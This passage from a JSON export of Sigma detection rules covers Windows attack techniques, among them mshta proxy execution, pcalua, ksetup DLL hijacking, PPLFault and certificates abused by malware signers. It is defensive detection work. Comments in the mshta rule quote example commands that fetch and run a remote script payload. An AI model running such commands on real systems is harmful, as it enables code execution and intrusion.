"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.084804Z",
"creation_date": "2026-03-23T11:45:34.084806Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.084811Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://github.com/nettitude/Aladdin/tree/main",
"https://www.tiraniddo.dev/2017/07/dg-on-windows-10-s-executing-arbitrary.html",
"https://attack.mitre.org/techniques/T1559/"
],
"name": "t1559_addinprocess_exploit.yml",
"content": "title: AddInProcess.exe Code Execution Detected\nid: d4f15ea4-71e4-4670-8baf-2801a6e000e1\ndescription: |\n Detects the execution of the AddInProcess.exe binary from the .NET Framework, with the '32a91b0f-30cd-4c75-be79-ccbd6345de99' GUID as one of its arguments.\n This can be used by attackers to execute arbitrary code under legitimate processes to hide their traces.\n It is recommended to investigate the processes spawned by the PID contained in the command-line or AddInProcess.exe.\nreferences:\n - https://github.com/nettitude/Aladdin/tree/main\n - https://www.tiraniddo.dev/2017/07/dg-on-windows-10-s-executing-arbitrary.html\n - https://attack.mitre.org/techniques/T1559/\ndate: 2023/09/05\nmodified: 2025/01/28\nauthor: HarfangLab\ntags:\n - attack.execution\n - attack.t1559\n - classification.Windows.Source.ProcessCreation\n - classification.Windows.Behavior.DefenseEvasion\n - classification.Windows.Behavior.ProxyExecution\nlogsource:\n category: process_creation\n product: windows\ndetection:\n selection:\n OriginalFileName:\n - 'AddInProcess.exe'\n - 'AddInProcess32.exe'\n CommandLine|contains: '/guid:32a91b0f-30cd-4c75-be79-ccbd6345de99'\n\n condition: selection\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "d4f15ea4-71e4-4670-8baf-2801a6e000e1",
"rule_name": "AddInProcess.exe Code Execution Detected",
"rule_description": "Detects the execution of the AddInProcess.exe binary from the .NET Framework, with the '32a91b0f-30cd-4c75-be79-ccbd6345de99' GUID as one of its arguments.\nThis can be used by attackers to execute arbitrary code under legitimate processes to hide their traces.\nIt is recommended to investigate the processes spawned by the PID contained in the command-line or AddInProcess.exe.\n",
"rule_creation_date": "2023-09-05",
"rule_modified_date": "2025-01-28",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.execution"
],
"rule_technique_tags": [
"attack.t1559"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "d50e7dfa-7326-48ae-87cc-cea110b10906",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "moderate",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.069569Z",
"creation_date": "2026-03-23T11:45:34.069571Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.069576Z",
"rule_level": "high",
"rule_confidence": "moderate",
"rule_confidence_override": null,
"references": [
"https://twitter.com/KyleHanslovan/status/912659279806640128",
"https://attack.mitre.org/techniques/T1202/"
],
"name": "t1202_indirect_command_execution_pcalua.yml",
"content": "title: Indirect Command Executed via pcalua.exe\nid: d50e7dfa-7326-48ae-87cc-cea110b10906\ndescription: |\n Detects a suspicious execution of pcalua.exe, the legitimate windows Program Compatibility Assistant.\n Attackers may abuse it to bypass security restrictions.\n It is recommended to check for suspicious activities by the newly created process.\nreferences:\n - https://twitter.com/KyleHanslovan/status/912659279806640128\n - https://attack.mitre.org/techniques/T1202/\ndate: 2022/01/21\nmodified: 2025/04/03\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.t1202\n - classification.Windows.Source.ProcessCreation\n - classification.Windows.LOLBin.Pcalua\n - classification.Windows.Behavior.DefenseEvasion\n - classification.Windows.Behavior.ProxyExecution\nlogsource:\n category: process_creation\n product: windows\ndetection:\n selection:\n Image|startswith: '?:\\'\n ParentImage|endswith: '\\pcalua.exe'\n ParentCommandLine|contains: ' -a '\n\n exclusion_programfiles:\n Image|startswith:\n - '?:\\Program Files\\'\n - '?:\\Program Files (x86)\\'\n\n exclusion_wondershare:\n ParentCommandLine|startswith: '?:\\WINDOWS\\system32\\pcalua.exe -a ?:\\Users\\\\*\\AppData\\Local\\Wondershare\\'\n\n condition: selection and not 1 of exclusion_*\nlevel: high\nconfidence: moderate\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "d50e7dfa-7326-48ae-87cc-cea110b10906",
"rule_name": "Indirect Command Executed via pcalua.exe",
"rule_description": "Detects a suspicious execution of pcalua.exe, the legitimate Windows Program Compatibility Assistant.\nAttackers may abuse it to bypass security restrictions.\nIt is recommended to check the newly created process for suspicious activity.\n",
"rule_creation_date": "2022-01-21",
"rule_modified_date": "2025-04-03",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion"
],
"rule_technique_tags": [
"attack.t1202"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "d512b029-d424-41f5-8d42-4e5ddeb15085",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.098741Z",
"creation_date": "2026-03-23T11:45:34.098743Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.098747Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows",
"https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/",
"https://attack.mitre.org/techniques/T1574/001/"
],
"name": "t1574_001_dll_hijacking_ksetup.yml",
"content": "title: DLL Hijacking via ksetup.exe\nid: d512b029-d424-41f5-8d42-4e5ddeb15085\ndescription: |\n Detects potential Windows DLL Hijacking via ksetup.exe.\n DLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\n Attackers used this technique by copying legitimate Windows signed executable from System32 or SysWow64 to a non-standard directory and plant the malicious DLL within the same folder.\n It is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\nreferences:\n - https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows\n - https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/\n - https://attack.mitre.org/techniques/T1574/001/\ndate: 2021/12/10\nmodified: 2025/07/11\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.persistence\n - attack.privilege_escalation\n - attack.t1574.001\n - classification.Windows.Source.LibraryLoaded\n - classification.Windows.Behavior.DLLHijacking\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: library_event\ndetection:\n selection:\n ProcessOriginalFileName: 'ksetup.exe'\n ProcessSignature: 'Microsoft Windows'\n ImageLoaded|endswith:\n - '\\CRYPTBASE.dll'\n - '\\dpx.dll'\n - '\\logoncli.dll'\n - '\\netutils.dll'\n - '\\srvcli.dll'\n - '\\SspiCli.dll'\n filter_legitimate_image:\n Image|startswith:\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\WinSxS\\'\n filter_legitimate_imageloaded:\n ImageLoaded|startswith:\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\WinSxS\\'\n filter_signature_imageloaded:\n Signed: 'true'\n Signature: 'Microsoft Windows'\n condition: selection and not 1 of filter_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "d512b029-d424-41f5-8d42-4e5ddeb15085",
"rule_name": "DLL Hijacking via ksetup.exe",
"rule_description": "Detects potential Windows DLL Hijacking via ksetup.exe.\nDLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\nAttackers use this technique by copying a legitimate Windows-signed executable from System32 or SysWOW64 to a non-standard directory and planting the malicious DLL in the same folder.\nIt is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\n",
"rule_creation_date": "2021-12-10",
"rule_modified_date": "2025-07-11",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion",
"attack.persistence",
"attack.privilege_escalation"
],
"rule_technique_tags": [
"attack.t1574.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "d5940bab-18fd-4719-b8c3-9f71214f4b62",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "critical",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.074655Z",
"creation_date": "2026-03-23T11:45:34.074657Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.074661Z",
"rule_level": "critical",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://github.com/gabriellandau/PPLFault",
"https://www.elastic.co/security-labs/inside-microsofts-plan-to-kill-pplfault",
"https://attack.mitre.org/techniques/T1003/001/"
],
"name": "t1003_001_dll_loaded_related_to_pplfault.yml",
"content": "title: Malicious DLL Loaded Related to PPLFault\nid: d5940bab-18fd-4719-b8c3-9f71214f4b62\ndescription: |\n Detects the suspicious loading of a DLL related to PPLFault.\n PPLFault is a tool that exploits vulnerabilities to bypass LSA protection, terminate or blind EDR software, and modifies kernel memory without the use of any vulnerable drivers.\n It is recommended to investigate the context of this action to determine its legitimacy.\nreferences:\n - https://github.com/gabriellandau/PPLFault\n - https://www.elastic.co/security-labs/inside-microsofts-plan-to-kill-pplfault\n - https://attack.mitre.org/techniques/T1003/001/\ndate: 2024/01/26\nmodified: 2025/02/14\nauthor: HarfangLab\ntags:\n - attack.credential_access\n - attack.t1003.001\n - attack.privilege_escalation\n - attack.t1068\n - classification.Windows.Source.LibraryLoaded\n - classification.Windows.HackTool.PPLFault\n - classification.Windows.Behavior.Exploitation\n - classification.Windows.Behavior.ImpairDefenses\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: library_event\ndetection:\n selection:\n ImageLoaded|endswith: '\\EventAggregationPH.dll'\n\n condition: selection\nlevel: critical\nconfidence: strong",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "d5940bab-18fd-4719-b8c3-9f71214f4b62",
"rule_name": "Malicious DLL Loaded Related to PPLFault",
"rule_description": "Detects the suspicious loading of a DLL related to PPLFault.\nPPLFault is a tool that exploits vulnerabilities to bypass LSA protection, terminate or blind EDR software, and modify kernel memory without the use of any vulnerable drivers.\nIt is recommended to investigate the context of this action to determine its legitimacy.\n",
"rule_creation_date": "2024-01-26",
"rule_modified_date": "2025-02-14",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.credential_access",
"attack.privilege_escalation"
],
"rule_technique_tags": [
"attack.t1003.001",
"attack.t1068"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "d5a4403b-552a-4e35-8da6-8a73481e966f",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.088246Z",
"creation_date": "2026-03-23T11:45:34.088248Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.088252Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://lolbas-project.github.io/lolbas/Binaries/Mshta/",
"https://attack.mitre.org/techniques/T1218/005/"
],
"name": "t1218_005_mshta_jscript.yml",
"content": "title: Proxy Execution of JScript via mshta.exe\nid: d5a4403b-552a-4e35-8da6-8a73481e966f\ndescription: |\n Mshta can be used to proxy the execution of a malicious VBScript/JScript.\n This script may, in turn, be used to run abritrary code on the infected system.\n It is recommended to investigate the parent process for suspicious activities as well as to look for subsequent suspicious actions stemming from the mshta process itself.\nreferences:\n - https://lolbas-project.github.io/lolbas/Binaries/Mshta/\n - https://attack.mitre.org/techniques/T1218/005/\ndate: 2021/02/10\nmodified: 2025/04/25\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.t1218.005\n - classification.Windows.Source.ProcessCreation\n - classification.Windows.LOLBin.Mshta\n - classification.Windows.Behavior.DefenseEvasion\n - classification.Windows.Behavior.ProxyExecution\nlogsource:\n category: process_creation\n product: windows\ndetection:\n # mshta.exe vbscript:Close(Execute(\"GetObject(\"\"script:https[:]//webserver/payload[.]sct\"\")\"))\n # mshta.exe javascript:a=GetObject(\"script:https://raw.githubusercontent.com/LOLBAS-Project/LOLBAS/master/OSBinaries/Payload/Mshta_calc.sct\").Exec();close();\n selection_bin:\n - Image|endswith: '\\mshta.exe'\n - OriginalFileName: 'MSHTA.EXE'\n\n selection_jscript:\n - CommandLine|contains:\n - 'javascript:'\n - 'vbscript:'\n - 'about:'\n\n exclusion_ivanti:\n Ancestors|contains:\n - '?:\\Program Files (x86)\\Ivanti\\EPM Agent\\SWD\\sdistbat.exe|?:\\Program Files (x86)\\Ivanti\\EPM Agent\\SWD\\SDCLIENT.EXE|?:\\Program Files (x86)\\Ivanti\\EPM Agent\\Shared Files\\residentAgent.exe'\n - '?:\\Program Files\\Ivanti\\EPM Agent\\SWD\\sdistbat.exe|?:\\Program Files\\Ivanti\\EPM Agent\\SWD\\SDCLIENT.EXE|?:\\Program Files\\Ivanti\\EPM Agent\\Shared Files\\residentAgent.exe'\n\n exclusion_msgbox:\n CommandLine|startswith:\n - 'mshta vbscript:Execute(msgbox'\n - 'mshta.exe vbscript:Execute(msgbox'\n\n exclusion_smartcontrol:\n 
CommandLine|contains: '?:\\SmartControlBeta\\resources\\bin\\ext\\GLHubUpdateToolCli_ISP.exe'\n\n condition: all of selection_* and not 1 of exclusion_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "d5a4403b-552a-4e35-8da6-8a73481e966f",
"rule_name": "Proxy Execution of JScript via mshta.exe",
"rule_description": "Mshta can be used to proxy the execution of a malicious VBScript/JScript.\nThis script may, in turn, be used to run arbitrary code on the infected system.\nIt is recommended to investigate the parent process for suspicious activities as well as to look for subsequent suspicious actions stemming from the mshta process itself.\n",
"rule_creation_date": "2021-02-10",
"rule_modified_date": "2025-04-25",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion"
],
"rule_technique_tags": [
"attack.t1218.005"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "d5b14d8f-5c6d-4e7f-884a-c0f4c1663795",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.625773Z",
"creation_date": "2026-03-23T11:45:34.625775Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.625779Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://blog.talosintelligence.com/old-certificate-new-signature/",
"https://www.bitdefender.com/files/News/CaseStudies/study/421/Bitdefender-PR-Whitepaper-IndEs-creat6269-en-EN.pdf",
"https://twitter.com/th3_protoCOL/status/1587823143854698497",
"https://blogs.blackberry.com/en/2022/11/romcom-spoofing-solarwinds-keepass",
"https://www.trendmicro.com/en_us/research/22/c/purple-fox-uses-new-arrival-vector-and-improves-malware-arsenal.html",
"https://twitter.com/pr0xylife/status/1595096438798696448",
"https://www.mandiant.com/resources/blog/hunting-attestation-signed-malware",
"https://twitter.com/ESETresearch/status/1594937059348992001",
"https://twitter.com/jaydinbas/status/1646475092006785027",
"https://www.trendmicro.com/en_us/research/23/e/blackcat-ransomware-deploys-new-signed-kernel-driver.html",
"https://attack.mitre.org/techniques/T1553/002/"
],
"name": "t1553_002_process_malicious_certificate.yml",
"content": "title: Process Executed Signed with Malicious Certificate\nid: d5b14d8f-5c6d-4e7f-884a-c0f4c1663795\ndescription: |\n Detects the execution of files signed with a certificate that was used by malicious actors.\n This can be indicative of a malicious actor trying to evade EDR/AV solutions with a forged signature.\n It is recommended to analyze the binary for malicious content and to look for suspicious actions on the host.\nreferences:\n - https://blog.talosintelligence.com/old-certificate-new-signature/\n - https://www.bitdefender.com/files/News/CaseStudies/study/421/Bitdefender-PR-Whitepaper-IndEs-creat6269-en-EN.pdf\n - https://twitter.com/th3_protoCOL/status/1587823143854698497\n - https://blogs.blackberry.com/en/2022/11/romcom-spoofing-solarwinds-keepass\n - https://www.trendmicro.com/en_us/research/22/c/purple-fox-uses-new-arrival-vector-and-improves-malware-arsenal.html\n - https://twitter.com/pr0xylife/status/1595096438798696448\n - https://www.mandiant.com/resources/blog/hunting-attestation-signed-malware\n - https://twitter.com/ESETresearch/status/1594937059348992001\n - https://twitter.com/jaydinbas/status/1646475092006785027\n - https://www.trendmicro.com/en_us/research/23/e/blackcat-ransomware-deploys-new-signed-kernel-driver.html\n - https://attack.mitre.org/techniques/T1553/002/\ndate: 2022/07/21\nmodified: 2025/12/30\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.t1553\n - attack.t1553.002\n - classification.Windows.Source.ProcessCreation\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n category: process_creation\n product: windows\ndetection:\n selection:\n ProcessSignatureSignerThumbprint:\n # https://www.bitdefender.com/files/News/CaseStudies/study/421/Bitdefender-PR-Whitepaper-IndEs-creat6269-en-EN.pdf\n - '7C496F5FE65803A45AD7BD8DA5F59B8548E08E0A'\n # https://twitter.com/th3_protoCOL/status/1587823143854698497\n - 'FDD415C4B8A6983CFA982ECABB6D9A55BFD9F623'\n # 
https://blogs.blackberry.com/en/2022/11/romcom-spoofing-solarwinds-keepass\n - 'F55B2365D9E837777B760305C78E674B686E5834'\n # https://www.trendmicro.com/en_us/research/22/c/purple-fox-uses-new-arrival-vector-and-improves-malware-arsenal.html\n - 'C7939F8303CA22EFFB28246E970B13BEE6CB8043'\n - '9E7CE1AED4A1C8A985D76BFCD65AC71BFF75430D'\n # https://twitter.com/pr0xylife/status/1595096438798696448\n - 'AAD723780CD440026A6CA0AA1E9D13D09F877E8F'\n # https://www.mandiant.com/resources/blog/hunting-attestation-signed-malware\n - '848C69A831D3789FA2BF6D7A7C8591F80A8F7FCB'\n - 'A8F9B64E4C5CC2AFE5E82DC3C9F44A1BDA2ED4B1'\n - '520CD357E195B57E0BFE7AF87227F4C0737E6BDE'\n - 'DBEB38C344441CB35FF982D1301A1C3DF992E140'\n - '60EE3FC53D4BDFD1697AE5BEAE1CAB1C0F3AD4E3'\n - 'AF5A136DCCED63DEFC29502FEDE9BFF7E2C16A8C'\n - '3A1CE9C2EE30EE8D8883DFC5BF45FF0201C2AB5D'\n # https://twitter.com/ESETresearch/status/1594937059348992001\n - '6EF192CBD6E540F1D740D1BD96317ACAE8C6AF9D'\n # https://www.sentinelone.com/labs/wip19-espionage-new-chinese-apt-targets-it-service-providers-and-telcos-with-signed-malware/\n - '68FF94B5C77481CC3AB10A05F3C926711C9C5F93'\n # https://twitter.com/SquiblydooBlog/status/1660782805687865344\n - '84F120783C24B1300ADD782414901503AF2F964A'\n # https://twitter.com/jaydinbas/status/1646475092006785027\n - '6ADE753659F5624D5A5D747523F07E23CAD9E65C'\n # https://www.trendmicro.com/en_us/research/23/e/blackcat-ransomware-deploys-new-signed-kernel-driver.html\n - '9EEEF1B33142106A095364DD0B2BFC8A24A2A563'\n # https://www.virustotal.com/gui/file/56066ed07bad3b5c1474e8fae5ee2543d17d7977369b34450bd0775517e3b25c/details\n - '0DD4552A9AABC00F61E619F4812DAFADCAA48715'\n # https://blog.talosintelligence.com/old-certificate-new-signature/\n - '6BC9649368643760190234FBB8395F4CACC2C9CB' # WoSign Class 3 Code Signing CA - 绍兴易游网络科技有限公司\n - '8B91C4BA4546F16D407CEB58090E1C8D82CAF2AC' # thawte SHA256 Code Signing CA - 北京汇聚四海商贸有限公司\n - 'FE6885F629D920DCE90FB03F0DB7B95709811C0D' # thawte SHA256 
Code Signing CA - 善君 韦\n - 'F981DB345F885899FAE9382D7D3BCAF75B1CE797' # VeriSign Class 3 Code Signing 2010 CA - Beijing Chunbai Technology Development Co., Ltd\n - 'C61A221389C98EE2FBC0E57A62DEE5A915E6C509' # VeriSign Class 3 Code Signing 2010 CA - Fuqing Yuntan Network Tech Co.,Ltd.\n - '7B69FF55D3C39BD7D67A10F341C1443425F0C83F' # VeriSign Class 3 Code Signing 2010 CA - Zhuhai liancheng Technology Co., Ltd.\n - '864FD20B322E8C7CDB0D7AA69C8475F09D602C3D' # VeriSign Class 3 Code Signing 2010 CA - Baoji zhihengtaiye co.,ltd\n - '85C58500333C98954160FCA3EE9A26B659A5F451' # VeriSign Class 3 Code Signing 2010 CA - Jiangsu innovation safety assessment Co., Ltd.\n - 'D715230B535C8937B469632EC6158761FD18AD21' # VeriSign Class 3 Code Signing 2010 CA - Shenzhen Luyoudashi Technology Co., Ltd.\n - 'DF788AA00EB400B552923518108EB1D4F5B7176B' # VeriSign Class 3 Code Signing 2010 CA - Beijing JoinHope Image Technology Ltd.\n - '775141B89F48B71DADC19F13011A46E537E7029C' # Thawte Code Signing CA - NHN USA Inc.\n # https://twitter.com/1ZRR4H/status/1699923793077055821\n # https://bazaar.abuse.ch/sample/1fc7dbbff1ea28f00d8c32de90c2559e4aa3629d26627094e92ff111e1092875/\n - '21A97512A2959B0E74729BE220102AEF1DCF56FD'\n # Koi Loader\n # https://www.virustotal.com/gui/file/a43d460e43d27df91c02292c1e7d5d7920c2b3dc3b2749b1bbc7f28657588947\n - '2A0B1BEDF4CCC933A5FDB885EDA8211F9B258ABE'\n # https://www.virustotal.com/gui/file/f677be06af71f81c93b173bdcb0488db637d91f0d614df644ebed94bf48e6541\n - 'C855F7541E50C98A5AE09F840FA06BADB97AB46C'\n # https://www.virustotal.com/gui/file/5550ea265b105b843f6b094979bfa0d04e1ee2d1607b2e0d210cd0dea8aab942\n - '686B7EBBA606303B5085633FCAA0685272B4D9B9'\n # 'https://www.virustotal.com/gui/file/dc8e5cae55181833fa9f3dd0f9af37a2112620fd47b22e2fd9b4a1b05c68620f'\n - '74DF2582AF3780D81A8071E260C2B04259EFC35A'\n # e55ab7a33fc783c6b291f8f3a77615e5db40f157e1e6cff7b3472b0b8acafaf0\n - 'FA6146F1FDAD58B8DB08411C459CB70ACF82846D'\n # 
15b195152a07bb22fec82aa5c90c7ff44a10c0303446ce11f683094311a8916b\n - '561620A3F0BF4FB96898A99252B85B00C468E5AF'\n # ef2d8f433a896575442c13614157261b32dd4b2a1210aca3be601d301feb1fef\n - '94EEBFC9A334B52FE42535DD0F2D4B052FB3D3D5'\n # 391417a433d77b2eb838bce25e1e4f3016a260c8231af4280b82c9c021bb468e\n - '5331A2A90EDD8F1E9745832CB6996420C57D605B'\n # https://www.virustotal.com/gui/file/87200e8b43a6707cd66fc240d2c9e9da7f3ed03c8507adf7c1cfe56ba1a9c57d\n - '94C21E6384F2FFB72BD856C1C40B788F314B5298'\n # https://www.elastic.co/security-labs/abyssworker\n - '0786E6A95B9B6FC9495F319AC2E334103AAB292F'\n - '811500AD165F66CAD3E607CD1253A5EDC91CB4D0'\n - 'D01B544CF4A4F901FA496BEA2B3A8F66F9583CB2'\n - '7749BE16F266669D505684E9F002C689706C4295'\n - '00F1435238447BBA9560E2A9A8C781861EBB15BC'\n - 'D36A5F40D62A4CCB0CFF098D0BBFAA30257D487D'\n - 'DA2CFA2262049049A7A2CA8FAF463669F19B8D5F'\n - '45D2D18BCCD270185F012271C1D6B7C890BA7C02'\n - '18760B486C35B6FF79EA5C461313DE2087353FEA'\n # https://x.com/tangent65536/status/1914373135337701588\n - '22EACBF575EA3FF19A6F639E80E8768405C9BDFE'\n # https://expel.com/blog/you-dont-find-manualfinder-manualfinder-finds-you/\n # https://www.truesec.com/hub/blog/tamperedchef-the-bad-pdf-editor\n - '99201EEE9807D24851026A8E8884E4C40245FAC7' # GLINT SOFTWARE SDN. BHD.\n - 'A2278EB6A438DC528F3EBFEB238028C474401BEF' # Echo Infini Sdn. Bhd.\n - '29338264019B62D11F9C6C4B5A69B78B899B4DF6' # ECHO INFINI SDN. BHD.\n - '17F77710C888E30917F71F7909086BCC2D131F61' # Byte Media Sdn. Bhd.\n - '7533D9D9C5241D0E031C21304C6A3FF064F79072' # ECHO INFINI SDN. 
BHD.\n - '3B5253A4853056458675B5CB1903C05BC2DBBD1B' # BLACK INDIGO LTD\n - '76C675514EEC3A27A4E551A77ED30FBB0DC43A01' # Summit Nexus Holdings LLC\n # https://www.virustotal.com/gui/file/f9dd0b57a5c133ca0c4cab3cca1ac8debdc4a798b452167a1e5af78653af00c1\n - '9A6EE51A6A437603ACEE9ADC5F1A5F13329A7E59'\n # https://securelist.com/honeymyte-kernel-mode-rootkit/118590/\n # https://www.virustotal.com/gui/file/dc8b123d91a29661c92b0de3d4f06e0ca17b0633b87e45c09245d82bb84f3860\n - '1F33285626E81F4845936C7A2A55A46F6DADA651'\n\n condition: selection\nlevel: high\n# level: critical\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "d5b14d8f-5c6d-4e7f-884a-c0f4c1663795",
"rule_name": "Process Executed Signed with Malicious Certificate",
"rule_description": "Detects the execution of files signed with a certificate known to have been used by malicious actors.\nThis can indicate an attempt to evade EDR/AV solutions by presenting a valid signature: such certificates are generally stolen, leaked or fraudulently obtained rather than forged, so the signature itself usually verifies and the certificate is the indicator.\nBecause the rule matches on the certificate rather than on the binary, a benign file signed with the same compromised certificate will also trigger; it is recommended to analyze the binary for malicious content, check its hash against threat intelligence, and look for suspicious actions on the host.\n",
"rule_creation_date": "2022-07-21",
"rule_modified_date": "2025-12-30",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion"
],
"rule_technique_tags": [
"attack.t1553",
"attack.t1553.002"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "d5bec053-13ac-498d-8233-c20cac8072d1",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "medium",
"rule_effective_confidence": "weak",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
